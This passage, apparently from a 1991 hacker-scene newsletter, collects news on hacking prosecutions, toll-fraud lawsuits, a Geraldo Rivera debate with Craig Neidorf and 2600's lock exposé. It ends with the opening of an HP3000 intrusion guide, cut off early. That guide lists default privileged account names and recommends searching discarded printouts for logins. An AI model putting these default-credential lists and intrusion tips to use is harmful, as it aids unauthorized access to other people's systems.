breach private files. Initially, the challenge was issued to corporate security experts--and none has been able to sneak in during the past few months, said spokesman D. Scott Belin. Now, in a bold publicity stunt, the company will offer a toll-free phone number to let any whiz kid or mischief maker log onto a computer and hack away. "There's probably 10,000 computer hackers out there," Belin said. "We're trying to figure out a way tohandle all the phone calls once we make the number available." He said the company, which makes a computer operating system widely used by phone companies, has yet to decide how to publicize the toll-free access number. Marilyn Partel, an operating systems manager at the company, said the software has been redesigned so that no one--even if authorized--has unlimited access to the system. --- Subject: Looking for Sundevil Victims Contact: Craig Neidorf and David Sobel (Computer Professionals for Social Responsibility) Computer Professionals for Social Responsibility (CPSR) is pursuing a lawsuit against the Secret Service seeking the release of information concerning Operation Sun Devil. In recently filed court papers, the agency claims that the information cannot be disclosed because, among other reasons, disclosure would violate the privacy of those individuals who are the targets of the investigation. This argument can be overcome if CPSR obtains signed releases from those individuals. CPSR is requesting the cooperation of anyone who was the subject of a Sun Devil raid on or about May 7, 1990. We are prepared to enter into an attorney-client relationship with individuals responding to this request, so that confidentiality will be assured. Please respond ASAP to: David Sobel CPSR Legal Counsel (202) 544-9240 dsobel@washofc.cpsr.org --- Source: NewsBytes Date: October 1, 1991 JEFFERSON VALLEY, NEW YORK, U.S.A., 1991 OCT 1 (NB) -- Cyberpunk co-author Katie Hafner, in an interview with Newsbytes, has responded to allegations of fabrication raised by Kevin Mitnick, one of the main subjects of the book. Cyberpunk: Outlaws and Hackers on the Computer Frontier (Katie Hafner and John Markoff; Simon & Schuster, 1991 - $22.95) devotes the first section of the book called "Kevin: The Dark Side Hacker" to the activities of Mitnick and his associates, Lenny DiCicco, "Susan Thunder" and "Roscoe" (the last two names are pseudonyms; the persons would be interviewed only under the protection of anonymity). Mitnick, who served a prison term related to his intrusions into Digital Equipment Corporation's systems, says in a letter to the Summer 1991 issue of 2600: The Hacker Quarterly that the section concerning him "is 20% fabricated and libelous." Mitnick, in the letter, suggests that the authors had motivation for the alleged unfairness. He said "It seems that the authors acted with malice to cause me harm after my refusal to cooperate. Interestingly, I did offer to participate as a factual information source if I was compensated for my time, but the authors refused, claiming it would taint my objectivity. So, consequently, I declined to cooperate." Hafner confirmed that Mitnick had refused cooperation after his offer to meet for pay was rejected but denied that his action caused any malicious or unfair behavior. She said "I feel that the payment of interview subjects is completely unethical and I have never been involved in such a thing and did not intend to start then. We mentioned in the book that Kevin had refused to cooperate but did not reveal that he had asked for payment. Since he has not brought the subject up, both in a call to the Tom Snyder radio show when I was on and in the 2600 letter, I will confirm the fact that his non-cooperation was due to our refusal to pay." Hafner continued "Mitnick's lack of cooperation certainly did not lead to any malice or bias directed toward him. Everything in the book is, to the best of my knowledge, factual and we did everything possible to insure its accuracy. We attempted to get a confirming source for everything we were told and interviewed dozens of persons for the Dark Hacker section alone." 'Kevin's lack of cooperation did make the job more difficult and, may have possibly hurt him. If he had been willing to talk, he would have had an opportunity to respond to other people's statements about him but, even though we sent him numerous "return receipt" and overnight letters asking him to meet with us, he refused. Two cases in point: in the 2600 letter, he says that we described him as always eating in a computer room while talking on the telephone to Bonnie, his future wife. He denies this and says that I was trying to 'paint an unsavory picture'. It was Bonnie who told us that he was always eating while he was talking -- we didn't make it up -- and without the ability to speak to him, we had to choose to go on." Hafner went on: "The second example is his statement that we said that he taunted USC's Mark Brown when, in fact, he 'never spoke with Mark Brown'. Brown says that he has definitely spoken to Mitnick and that he remembers the calls well and can call to mind details from them. If we had spoken to Mitnick, he would have had a chance to dispute such statements. In response to Mitnick's object to the authors' changing of items that would possibly identify DiCicco as an unemployment cheat, Hafner said "That was my call. We tried to protect identities wherever it was desired. Lenny asked us to change the name and we did just as we also used public aliases for 'Roscoe' and 'Susan Thunder' at their request. Contrary to Kevin's statement, Lenny has not been travelling around with us promoting the book and has received no benefit from it other than the ability to tell his story as he understands it." --- Subject: Phone Gall Source: InformationWeek, pp.12-13 (By Mary E. Thyfault with Diane Medina and Bob Violino) Date: August 26, 1991 AT&T has sued nearly 20 of its large business users for refusing to pay for calls made by hackers through their corporate telephone In recent months, the question of whether businesses victimized by phone hackers should be forced to pay for such calls has stirred acrimonious debate and prompted numerous actions before the Federal Communications Commission. Estimates of the corporate monies lost annually to phone hackers begin at $500 million and go into the billions. Now an InformationWeek investigation reveals a broad effort by AT&T to shift this debate to the courts. Among the corporations AT&T has quietly sued are Avis Rent-A-Car System Inc., FMC Corp., Citgo Petroleum Corp., Procter & Gamble Co., and Perkin-Elmer Corp. (see below). In the largest such lawsuit uncovered by IW, the United Nations was the victim of nearly $1 million in unauthorized calls. While the existence of these lawsuits remains unknown to most large users, AT&T has been playing legal hardball with corporate customers for at least a year, in most cases collecting fees in confidential, out-of-court settlements. It appears no case has yet reached the trial stage. The fact that users back down is no surprise; AT&T is a $36.11 billion behemoth with a crack legal staff. The mere threat of a lawsuit is enough to force most firms to pull out their checkbooks. "Who can afford to go to court with the phone company?" asks Roger Longtin, counsel for electronics component distributor Avnet Inc. in Great Neck, N.Y. , which is currently negotiating with AT&T over nearly $1 million in disputed charges. AT&T's long-distance rivals MCI Communications Corp. and US Sprint Communications Co. say they have not sued any users over this issue, and IW could find no evidence of any legal actions. Such a suit, explains a spokesman for MCI, "is a good way to lose a customer". One analyst argues, however, that MCI and Sprint can't afford to be nice guys much longer. "I'd be surprised if MCI and Sprint didn't file suits - uncollectibles have been a horrendous problem in the long-distance business," says John Bain, senior VP at Raymond James & Associates Inc. in St. Petersburg, Fla. One lawyer who has represented corporate victims of toll fraud says the out-of-court settlements always involve some payments by customers. AT&T typically starts negotiations by knocking 15% off the user's bill, he says; that's about the break-even point for AT&T's profit on long-distance calls, according to analysts. AT&T does not discuss litigation, a spokesman says. Some customers are enraged at AT&T and the telecom industry over this issue. They argue that the carriers and PBX vendors are not providing enough warning, training, or support. "The carriers should do away with the attitude of 'The customer should've known,'" charges Tim Honaker CFO for Dearborn Financial Publishing lnc. in Chicago, which has been hacked for $65,000. The telcom suppliers "come in with these great technologies and then say, 'By the way, you gotta figure out how to manage this thing on your own.' Well, we're not in that business." Suppliers should at least share in the responsibility and liability for phone fraud charges, according to victims. Vendors respond that telecom managers can virtually end fraud by properly managing their phone systems, particularly remote access features. Some users agree. Says Jay Silverberg, president of the National Rolm Users Group, "Although from a technical perspective the vendor has the responsibility to provide the ability to make a system secure, it's the user's responsibility to manage it." The software to monitor such systems isn't cheap, however-about $120,000 on average-and "it can only cut down the hemorrhaging, not eliminate hacking," says James Ross of Ross Engineering Inc., a software engineering firm in Sterling, Va. Most victims argue that carriers have the technology to detect hacking at their fingertips. While the victims' attorneys say AT&T hasn't improved its security measures, all the carriers and the major PBX vendors-Northern Telecom, Rolm Co., and the business telephone unit of AT&T-say they are putting increasing emphasis on helping users fight phone hacking. AT&T offers seminars at every user group meeting, for example, and Rolm announced in April it would begin assigning a security coordinator in each of its 31 branch locations. Currently, AT&T has seven fulltime staffers charged with educating customers and investigating fraud cases. Users claim that number is woefully low. (Meanwhile, the number of AT&T lawyers pursuing litigation in this area is, an AT&T spokesman admits, "probably in the tens.") AT&T has 40,000 PBX installations and 4 million business long-distance customers. "If they really want to protect the public, they need to hire more like 700 people," says Charles Helein, a Washington attorney who has represented several toll fraud victims. AT&T says it will add three more staffers next month. Some users even claim AT&T is not devoting more resources to ending toll fraud because it is making too much money on such calls-a charge AT&T vehemently denies. "If you significantly cut phone fraud, you have to wonder what kind of impact it would have on their revenue," says Thomas Crowe, attorney for Chartways Technologies Inc. in Rockville, Md., which suffered $81,789 in unauthorized calls. "That's ludicrous," says an AT&T spokesman. "AT&T devotes enormous resources to this." The company argues that it is doing more than required. On a weekly basis, AT&T monitors the three area codes in South America and Central America that receive the most illegal calls. When a sudden increase in volume is noted, AT&T tries to notify customers, reaching about 25%, of them before they themselves notice the break-in. "I can't tell you that every week we get to everyone, but we attempt to based on our resources," says Robert Carman, head of AT&T's corporate security division. Still, the FCC says all complaints filed to date by users over this issue have involved AT&T. Frank Chrz, VP of office services at ITT Consumer Financial Corp. in Minneapolis, says AT&T "was very responsive" in helping him detect and stop the hackers that penetrated his company's Rolm PBX, racking up $100,000 in charges. But that cooperation ended when the bill came due and ITT refused to pay. AT&T sued ITT, which promptly sued both Rolm and Rolm's PBX distributor. All four settled out of court. At least two other users have sued their PBX vendors after being sued by AT&T: New York City Human Resources Administration sued Northern Telecom Inc., and Western Diversified Life Insurance Co. in Deerfield, Ill., countersued AT&T as both its PBX supplier and long-distance carrier. In another twist, two corporations sued AT&T before AT&T could sue them: Mitsubishi International Corp. in New York (IW, June 24,p.14) and John D. Hollingsworth On Wheels Inc. in Greenville, S.C. Despite all the complex legal maneuvering, every case eventually comes down to finger-pointing. No one wants to accept responsibility for toll fraud. Until now, the FCC has typically ruled against users, but mounting corporate anger may mean the commission will impose some sort of liability ceiling. What is clear is that users and vendors will have to work together to solve the problem. "In no way are we inferring we can catch everything," says Bob Fox, Sprint's assistant VP of corporate security. "The majority of the time we're getting to the customer before he knows what's going on. But we're not going to catch everything every time. It takes teamwork. "The customer is going to get hurt if we do our thing but he doesn't do his, or vice versa." -Mary E. Thyfault with Diane Medina and Bob Violino --- Subject: Now It Can Be Told "Mad Hackers' Key Party" [excerpt] Source: Unknown User Date: September 30, 1991 Hosted by Geraldo Rivera Geraldo: I'm Geraldo rivera. And now, It can be told. Geraldo: Joining us now via satellite from Oakland, CA is the Assistant District Attorney Don Ingraham ... for Alameda County and he has been prosecuting computer hackers for years. Geraldo: Don, how do you respond to the feeling common among so many hackers that what they're doing is a public service; they're exposing the flaws in our security systems? Don: Right, and just like the people who rape a coed on campus are exposing the flaws in our nation's higher education security. It's absolute nonsense. They are doing nothing more than showing off to each other, and satisfying their own appetite to know something that is not theirs to know. Geraldo: Don, you stand by, Craig as well. And when we come back we'll hear more from prosecutor Ingraham and from, I guess his archrival here, the Mad Hacker Craig Neidorf. Geraldo: We're back with Craig Neidorf, a former University of Missouri student who ran a widely distributed electronic newsletter for computer hackers. He is so proud of being America's Most Wanted computer hacker that he has put together this very impressive scrapbook. Geraldo: Knight Lightning I guess that was your code? KL: It was my editor handle. Geraldo: That's your handle. OK. And from Oakland, CA we are talking with the Assistant District Attorney Don Ingraham, who is hard driven, you might say, to put people like Craig behind bars. Don, do you think Craig's lucky that he's not behind bars right now? Don: Yes, I think he's extraordinarily lucky. He was part of a conspiracy, in my opinion, to take property that wasn't his and share it with others. They charged him with interstate transport of stolen property - couldn't make the threshold -and it came out that it had been compromised by, unfortunately, released by another Bellcore subsidiary. But was certainly not through any doing of HIS that he is a free man. Geraldo: So you think that his activities stink, then. Don: Absolutely. No Question about it. Geraldo: Craig, you wanna respond? Are you doing something for the greater good of society? KL: Well I was merely publishing a newsletter. I didn't go out and find this document. Rather it was sent to me. In many ways it could be compared to Daniel Ellsberg sending the Pentagon Papers to the New York Times. Geraldo: Do you figure it that way Don? Is he like Daniel Ellsberg? Don: No, Ellsberg went to court to deal with it. Daniel Ellsberg's release of the Pentagon Papers is the subject of a published court decision to point out it was a matter of national security and national interest. The E911 codes, which is the citizen's link to the police department are not a matter of national security. They're a matter of the central service to the community....... Geraldo: You broke into the 911 system? He broke into the 911 system! KL: No, that's not correct. I never entered any 911 telephone system. Don: I didn't say he entered into it. What I said was that he and Riggs conspired together to take a code that they knew was necessary to 911 and to take it apart to see how it worked. They never had the owner's permission, they never asked for it. Geraldo: Alright, lemme ask you this.... KL: The court found that there was no conspiracy here. Geraldo: You were acquitted. You were vindicated at least from criminal responsibility. Lemme just quickly ask you this: hackers have been inside the White House computer. KL: Yes they have. Geraldo: And they've been inside the Pentagon computer. KL: Yes. Geraldo: And if Saddam Hussein hired some hackers whether they're from Holland or any other place, he could've gotten into these computers, presumably. KL: Presumably, he could've. Geraldo: And gotten some valuable information. KL: It's definitely possible. Geraldo: And you still think hackers are performing a public service? KL: That's not what I said. I think that those kind of activities are wrong. But by the same token, the teenagers, or some of the people here that are not performing malicious acts, while they should be punished should not be published as extreme as the law currently provides. Geraldo: You're response to that Don? Don: I don't think they're being punished very much at all. We're having trouble even taking away their gear. I don't know one of them has done hard time in a prison. The book, Hafner's book on _Cyberpunk_, points out that even Mitnick who is a real electronic Hannibal Lecter ... did not get near any of the punishment that what he was doing entitled him to. Geraldo: An electronic Hannibal Lecter. OK, stand by, we'll be back with more of this debate in a moment... Geraldo: Back with Craig Neidorf and prosecutor Don Ingraham. Craig, do you think hackers are voyeurs or are they potentially terrorists? KL: I think they resemble voyeurs more than terrorists. They are often times looking at places where they don't belong, but most hackers do not intend to cause any damage. Geraldo: Do you buy that Don? Don: If they stopped at voyeurism they would be basically sociopathic, but not doing near the harm they do now. But they don't stop at looking, that's the point. They take things out and share them with others, and they are not being accountable and being responsible as to whom they are sharing this information. That is the risk. Geraldo: Can they find out my credit rating? I know that's not a national security issue, but I'm concerned about it. Don: Piece of cake. Geraldo: No problem. Don: Assuming.... Geraldo: Go ahead. Assuming I have a credit rating...hahahah.... Don: Assume that the credit is not carried by someone who is using adequate security. Geraldo: But you think Craig it's not problem. KL: I think it's no problem. Geraldo: Give me quickly the worst case scenario. Say Abu Nidal had you working for him. KL: I'm sorry? Geraldo: Abu Nidal, notorious ..... KL: As far as your credit rating? Geraldo: No, not as far as my credit rating.. The world, national security. KL: Well, hackers have gotten into computer systems owned by the government before. At this point they've never acknowledged that it was anything that was ever classified. But even some unclassified information could be used to the detriment of our country. Geraldo: Like the counter-terrorist strategy on January 15th, the day of the deadline expired in the Persian Gulf. KL: Perhaps if Saddam Hussein had somehow known for sure that we were going to launch an attack, it might have benefited him in some way, but I'm really not sure. Geraldo: Don, worst case scenario, 30 seconds? Don: They wipe out our communications system. Rather easily done. Nobody talks to anyone else, nothing moves, patients don't get their medicine. We're on our knees. Geraldo: What do you think of Craig, quickly, and people like him? Don: What do I think of Craig? I have a lot of respect for Craig, I think he's probably going to be an outstanding lawyer someday. But he is contributing to a disease, and a lack of understanding ethically, that is causing a lot of trouble. Geraldo: One word answer. As the computer proliferate won't hackers also proliferate? Won't there be more and more people like you to deal with? Knight Lightning: I think we're seeing a new breed of hacker. And some of them will be malicious. Geraldo: Some of them will be malicious. Yes, well, that's it...for now. I'm Geraldo Rivera. [End of Program] --- Subject: 2600 Magazine Exposes Security Holes Source: NewsBytes Date: October 18, 1991 2600 Magazine Exposes Security Holes 10/18/91 ARMONK, NEW YORK, U.S.A., 1991 OCT 18 (NB) -- Supported by videotape examples, Emmanuel Goldstein, editor and publisher of 2600 Magazine: The Hacker Quarterly, told those in attendance at an October 17th New York City press conference that "the American public is often lulled into a false sense of security; a security that is often not supported by the facts of specific cases." The videotapes, produced by 2600 and provided to the press show both the intrusion of a Dutch "hacker" in to United States Military computers and what Goldstein alleges is the fallability of a brand of mechanical, pushbutton locks used by, among others, New York State University sites, Federal Express, United Parcel Service, JFK International Airport, IBM and NASA. Goldstein told Newsbytes "We invested considerable time and money to wake people up to the fact that we have a false sense of security when it comes not only to computer networks but to physical safety as well." The tape of the Dutch "hacker" was made by Goldstein while in Europe. and shows the intrusion into a Unites States Army computer system. The intruder was able to set up a fictitious account called "danquayle" and, once into the system, was able to obtain "root" privileges thus giving him total control of the workings of the system. A portion of this tape had previously been shown with Goldstein's approval on an episode of the Gerald Rivera television show "Now It Can Be Told". Goldstein told Newsbytes that one reason for his release of the entire tape to the press was his feeling that the Rivera episode entitled "The Mad Hacker's Key Party" had distorted the message of the tape - "This was not a case of a terrorist break-in but was rather simply a demonstration of the lack of security of our systems. To find root accounts with password like "Kuwait" and lack of sophisticated security in our military computers should be of real concern and should not be lost in an explotation of the 'hacker' issue." A background paper provided at the conference by 2600 explains the entire intrusion effort in detail and states "The purpose of this demonstration is to show just how easy it really was. Great care was taken to ensure that no damage or alteration of data occurred on this particular system. No military secrets were taken and no files were saved to a disk by the hackers. What is frightening is that nobody knows who else has access to this information or what their motivations might be. This is a warning that cannot be taken lightly." The second videotape show Goldstein and other 2600 staff opening seemingly at will locks manufactured by Simplex Security Systems. The locks of the mechanical pushbutton combination variety were shown to be installed at the State of New York University at Stony Brook, JFK International Airport and on Federal Express and United Parcel pick-up boxes throughout the New York Metropolitan area. In the film, Goldstein is shown filling out a Federal Express envelope for delivery to 2600 Magazine and inserting in the Fedex dropbox. He then lifts the weather protection cover on the box's lock and keys a combination that allows him to open the lock and remove his envelope. Scott Skinner, a SUNY student and 2600 staff member told Newsbytes that it had actually taken the staff 10 minutes to determine the proper code combinations to open the lock. Skinner explained, "While Simplex prefers people to think that there is an endless number of permutations to the lock, there are actually only 1,085. In most cases, even this number is greatly reduced -- if one knows that only three buttons are being used, it reduces the possibilities to 135. Additionally, we found that, once we had the combination to one Federal Express dropbox, it worked in every other one that we tried in the New York area." Goldstein told Newsbytes "When we contacted Simplex, they first denied that the locks were unsafe and then said that the permutations were much greater. After some discussion, they admitted that the 1,085 figure was correct but said that it would take a person with a complete listing of the combinations over four hours to try them all. Our experience obviously shows that they may be opened in a much shorter time than that." Goldstein also pointed out that, "although a $5 Master combination lock may be broken by a crowbar, it is a much more secure combination device. It has 64,000 combinations compared to the 1,085 with the Simplex." Goldstein continued, "One of the real problems is that, should a person have the misfortune to be robbed, entry due to a failure of the Simplex lock gives no evidence of a forcible break-in and police and insurance companies often put the blame on the homeowner or office manager for 'giving away the combination.' It really can create a problem." Skinner told Newsbytes "I'm really concerned about this. I'm a student at SUNY, Stony Brook and all our dormitories use these locks as the only means of security. I've shown the problem to Scott Law who is responsible for residence security but he has discounted the problem and said that the locks were installed at the recommendation of the campus locksmith. The locksmith, Garry Lenox contradicts Law and says that he recommended against these locks years ago and said that they were not secure for dormitory use." Skinner said that he will write an article for the college newspaper in an attempt to raise consciousness about this problem. Goldstein also said that he intends to publish the list of valid combinations in an up-coming issue of 2600 to demonstrate to the public the problems with the lock. He further said that he will raise the issue on his weekly radio show, "Off The Hook", heard on New York's WBAI-FM. In response to a Newsbytes question concerning how the 2600 staff happened to become involved in a problem with locks, Goldstein said, "We're hackers and when we see something with buttons on it, whether it's a computer or not, we tend to try it. While the average person tends to accept that things are secure just because he is told that they are, hackers will usually try them out. It's because of this 'trying out' that we can point out the problems with both the US military computer security and this lock -- and we feel that, in both cases, we have performed a service. People should be aware when they are at risk so that they may take action to correct it." --- Subject: CRIME IN CYBERSPACE session Source: Jim Thomas (CuD) Date: November 20, 1991 The CuD moderators, Mike Godwin of the Electronic Frontier Foundation, and several other prominent scholars will participate in a panel on "CRIME IN CYBERSPACE" at the American Criminological Society annual meetings in San Francisco on Friday, November 22. Their session will be in the Yorkshire Room of the St. Francis hotel from 1:15 to 2:45. The complete session: Chair: Gordon Meyer: Co-editor Computer underground Digest Mike Godwin (Staff Attorney, Electronic Frontier Foundation): "Criminal law and the computer youth culture" Richard C. Hollinger (University of Florida): "Hackers, Crackers, and Pirates: Rethinking Social Control" Lee Tien (University of California, Berkeley): "Folk Notions of Property & Privacy in the Information Society" Jim Thomas (Northern Illinois University): "From Disk to Discourse: The Images of Techno-Evil" Gary T. Marx (Department of Urban Studies and Planning): Discussant Albrecht Funk (University of Hamburg): Discussant --- Subject: Cracker charged in Australia Date: August 13, 1991 The AP (8/13/91) reports from Melbourne that Nahshon Even-Chaim, a 20-year old computer science student, is being charged in Melbourne's Magistrates' Court on charges of gaining unauthorized access to one of CSIRO's (Australia's government research institute) computers, and 47 counts of misusing Australia's Telecom phone system for unauthorized access to computers at various US institutions, including universities, NASA, Lawrence Livermore Labs, and Execucom Systems Corp. of Austin, Texas, where it is alleged he destroyed important files, including the only inventory of the company's assets. The prosecution says that the police recorded phone conversations in which Even-Chaim described some of his activities. No plea has been entered yet in the ongoing pre-trial proceedings. --- PHONE COMPANIES COULD TRANSMIT TV UNDER FCC PLAN -- Blow to Cable Industry -- Viewers Expected to Benefit From Many More Choices - New Lines Needed" Source: Edmund L. Andrews in {The New York Times} Date: October 25, 1991 at A1. In a surprising and controversial move to promote cable television competition, the Federal Communications Commission proposed today that local telephone companies be allowed to package and transmit television programming. The proposed rules, which were unanimously endorsed and are likely to be adopted within a year, would expose cable companies to the most threatening competition yet. But they could benefit cable television consumers, many of whom have seen their bills double and triple in recent years. The cable industry vowed to fight the proposals and threatened to challenge the rules in court if they are adopted. Telephone companies, eager to enter a lucrative new business, applauded. MORE CHOICES' FOR VIEWERS "Today's action will create competition and offer consumers more choices," said James R. Young, vice-president of regulatory and industry relations at the Bell Atlantic Corporation. "Let's hope it's a beginning to the end of turf wars." In essence, the commission recommended that telephone companies be allowed to offer "video dial tone" over telephone lines that would carry programming produced by outside companies. Consumers could view whatever programs they pleased and would be charged accordingly. Initially, telephone companies would serve promarily as a pipeline, not producing the programs. But the commission said telephone companies should also be allowed to organize and package video services, as long as they make their networks available to all programmers. The commission also opened an inquiry on whether to let telephone companies produce programs. CONGRESS HAS AVOIDED ISSUE The idea of allowing so-called video dial tone service has long been a favorite of the F.C.C.'s chairman, Alfred C. Sikes. Congress, which is weighing regulatory legislation to rein in cable proces has shied away from the issue. Today's action makes it more likely that lawmakers will have to reconsider the role of telephone companies in television. Before cable companies would feel much impact from today's F.C.C. proposal, however, most telephone companies would have to spend billions of dollars to install new fiber-optic transmission lines and switching equipment that could carry large volumes of television material. Analysts have estimated that the cost of converting every home in the country to a fiber-optic line would be $100 billion to $200 billion and that it would take at least five years. Most large telephone companies, including all of the regional Bell companies, already plan to replace their copper wires with fiber over the next two decades. The immense business opportunity posed by the $18 billion cable television market is likely to accelerate those plans. High-capacity communications lines that reach every home in America could radically alter the distribution of entertainment and enable people on home computers to tap distant libraries and obtain information in seconds. "Both program providers and consumers would have chances they don't have today, without the bottlenecks provided by cable companies and without the bottlenecks of broadcasting," said Richard Firestone, chief of the F.C.C.'s common carrier bureau. The move was immediately attacked by the National Cable Television Association, which threatened to challenge any new rules in court. "Until and unless the telco's monopoly in voice telephone is ended, no level of Government safeguards against cross-subsidies will be effective," said James P. Mahoney, president of the cable association. QUESTION OF TV PRODUCTION The most controversial issue, which the F.C.C. raised for discussion without recommendation, is whether telephone companies should be allowed to produce programming, a much bigger business than transmission. Many Bush Administration officials favor such a move, but television boradcasters and producers bitterly oppose it. Officials noted that such a shift would require changes in the Cable Television Act of 1984. "Among the top two or three concerns of ever cable operator has always been head-to-head competition against local telephone companies," said John Mansell, a senior analyst at Paul Kagan Associates, a marketing-research firm that monitors the cable industry. For telephone companies, the move could be a windfall. Steven R. Sieck, vice president of Link Resources Inc., a market-research firm in New York, said, "It's by far the largest market opportunity among the whole collection of information services" for telephone companies. It remains unclear, however, whether the new rules will survive in court. Teh Cable Television Act of 1984 bars a telephone company from owning a cable television franchise in the same market. The F.C.C. ruled today, however, that the law does not prevent a local telephone company from transmitting programs produced by other companies and that it does not bar long-distance carriers in any way. The Bell companies have lobbied strongly for legislation that would allow them to enter the cable business, and several companies have invested in European cable franchises. In addition, Pacific Telesis Group, which provides local phone service in California, already holds an option to buy a controlling interest in a Chicago cable franchise, which could be [sic] permissible since it is outside the company's telephone area. RULING ON FRANCHISE FEES The commission also handed down a ruling that could give telephone companies an important price advantage in future competition with cable operators and could prompt protests from local governments, ruling that neither a telephone company nor a video programmer needs to pay franchise fees to local governments. Under the cable act, by contrast, local governments can charge cable operators a franchise fee as high as five per cent of revenues. Explaining today's ruling, Mr. Sikes said, "We have segregation laws, and these segregation laws should be ended." He added that some cable companies were already installing optical fibers in their own networks, and that some were exploring the option of using their netowrks to offer telephone service. The proposals mark the second major change in longstanding restrictions on the telephone companies' ability to move into new services. Less than three weeks ago, a Federa appeals court cleared the way for the regional Bell companies to begin providing information services, like news, stock and sports tables, immediately. --- Source: Bell Labs News Date: October 28th, 1991 These New Jersey Bell technicians are actually in the process of taking a very well-behaved -- and the nation's oldest -- 1ESS(tm) out of service. The switch became the world's first commercial electronic switching system when it was installed in Succasunna, NJ in 1965. It was replaced with a 5ESS(tm) on September 28th. The cutover was accomplished in three steps. First, the new 5ESS was installed and hooked up to the incoming lines -- which were also still going to the old switch -- but not powered up. Then, at 1:00 AM, when there is relatively little traffic on the old switch, the cables coming in to the 1ESS were quickly cut. Once all the lines were cut, the new switch was turned on. The whole operation took only a few minutes, and agencies involved in emergency services were notified in advance of the brief service outage. The 1ESS design project, which was conducted at Whippany in the early 60's, was the largest single development effort undertaken by the Bell System up to that point, occupying more than 300 engineers and technicians. AT&T Network Systems and New Jersey Bell are considering donating part of the retired switch to the Smithsonian Institution. --- Subject: Computer Saboteur Pleads Guilty Source: Wire service report in the `Los Angeles Times', 5 Nov. '91, p. D2 Date: Wed, 6 Nov 1991 Computer Saboteur Pleads Guilty: Michael John Lauffenburger, 31, a former General Dynamics computer programmer who planted a destructive `logic bomb' in one of the San Diego defense contractor's mainframe computers, pleaded guilty to one count of attempted computer tampering. He faces up to one year in prison and a fine of $100,000. Federal prosecutors said Lauffenburger had hoped to increase his salary by creating a problem only he could solve: a program that was designed to destroy a database of Atlas Rocket components. He set the program to activate, then resigned, hoping, investigators say, that the company would rehire him as a highly paid consultant once it discovered the damage. But another General Dynamics programmer inadvertently ran across the program and alerted security, which disarmed the program. Bellcore has just announced a new edition of its Specification of Signalling System Number 7 (issue 2). The notice that came my way in the mail had a list price of USD$550, document number TR-NWT-000246. Covered are such things as Message Transfer Part (MTP), Singalling Connection Control Part (SCCP), ISDN User Part (ISUP), Transaction Capabilities Application Part (TCAP), Operation, Maintenance and Administration Part (OMAP) and Interworking of ISDN Access and Network Signaling. SS7 is a protocol that provides signalling within a telephone network; the idea is that signalling is done on a common channel, away from the voice circuits, in order to improve security and efficiency of connections. Practical examples of the network include the Caller Number ID service (SS7 delivers the caller's number to the called party) or the almost instantaneous call completion after Toronto-area subscribers dial the last digit on most local phone calls. I do not represent Bellcore; I'm just one who gets mailings from them. For more information, contact 1 800 521.CORE (USA) or +1 908 699.5800 (other), or check the FAQ for more info (mail address, Bellcore's activities). --- Sent by: Erik Bloodaxe "LEGION OF DOOM--INTERNET WORLD TOUR" T-SHIRTS! Now you too can own an official Legion of Doom T-shirt. This is the same shirt that sold-out rapidly at the "Cyberview" hackers conference in St. Louis. Join the other proud owners such as Lotus founder Mitch Kapor and award-winning author Bruce Sterling by adding this collector's item to your wardrobe. This professionally made, 100 percent cotton shirt is printed on both front and back. The front displays "Legion of Doom Internet World Tour" as well as a sword and telephone intersecting the planet earth, skull-and-crossbones style. The back displays the words "Hacking for Jesus" as well as a substantial list of "tour-stops" (internet sites) and a quote from Aleister Crowley. This T-shirt is sold only as a novelty item, and is in no way attempting to glorify computer crime. Shirts are only $15.00, postage included! Overseas add an additional $5.00. Send check or money-order (No CODs, cash or credit cards--even if it's really your card) made payable to Chris Goggans to: Chris Goggans 5300 N. Braeswood #4 Suite 181 Houston, TX 77096 [Editor's Note: I have one, and for any collector this is an item that is insurpassable -- JD] ============================================================================= / / / NIA073 / File 07 / / Hacking the HP3000 / / Malefactor / / / PRELUDE ^^^^^^^ The HP3000 operating system MPE is a very intricate and varied system. So varied is MPE that two systems running the same version of the OS will reveal startling differances. This file will be a general overview of MPE, not a guide to any particular version. The two primary types of MPE systems you will encounter are MPE and MPE XL. The difference between these versions of MPE will be specifically indicated within this file, due to the frequent occurance of such differances. Identifying an HP3000 ^^^^^^^^^^^^^^^^^^^^^ HP3000's can be recognized quite easily. Primarily, two prompts can be obtained when first calling an HP3000... : or MPE XL: Another simple method of identifying an HP3000 is the error message i.e. EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424) Although the error message may vary, (CIERR XXXX) is relatively consistent. Now once into an hp there can be 3 passwords per login, but there usually arn't any. Within the hp system, many default accounts exist; if there are none, however, the hp printouts contain everything you need to get in. This is where trashing definately pays off. Here is a listing of a few defaults/common accounts. ====================== Hacking into an HP3000 ====================== The HP3000 has numerous defaults/common accounts that are there I will briefly list a few of them: MGR.TELESUP (Has SM privelege) OPERATOR.SYS (Has SM privelege) FIELD.SUPPORT (Has SM privelege) MANAGER.SYS (Has SM privelege) MGR/MANAGER.HPOFFICE MGR/MANAGER.HPWORD MGR/MANAGER.ITF3000 MGR/MANAGER.SUPPORT MGR/MANAGER.SECURITY MGR/MANAGER.ROBELLE MGR/MANAGER.COGNOS MGR/MANAGER.TELAMON MGR/MANAGER.NETBASE MGR/MANAGER.VESOFT MGR/MANAGER.RJE MGR/MANAGER.HPMAIL MGR/MANAGER.FINANCE MGR/MANAGER.HP4DEMO MGR/MANAGER.HPPL85 MGR/MANAGER.HPPL87 MGR/MANAGER.HPPL89 MGR/MANAGER.ADMIN MGR/MANAGER.ACCOUNT MGR/MANAGER.PROD MGR/MANAGER.DISC MGR/MANAGER.TAXES MGR/MANAGER.CONV MGR/MANAGER.XLSERVER MGR/MANAGER.LIBRARY MGR/MANAGER.USER MGR/MANAGER.PATCH MGR/MANAGER.CALENDAR MGR/MANAGER.REGO MGR/MANAGER.VESOFT MGR/MANAGER.TOOLS There will always be a MGR or MANAGER user under every account. Because when an account is created on an HP3000 a user must be created to manage that account; thus, you have the manager or mgr. Almost always the user will be mgr.account, but occasionally manager is used. Only two accounts, manager.security and manager.itf3000, usually do not appear as mgr. Common Passwords and Password Explanation ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ There are two types of passwords primarily encountered on the HP3000. First and most common is staight MPE passwords which are entered at login. The second and more sinister are the Security 3000 passwords, which are entered after login. Mainly, you will encounter MPE password protection; however some system admins do utilize Security 3000 passwords. Security 3000 passwords will be discussed at greater length later within this file; I will now turn my attention to MPE passwords. MPE Passwording Scheme and Account Structure ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ The MPE passwording scheme works on all aspects of the login and can be entered in two ways examples... Example 1 ^^^^^^^^^ :HELLO 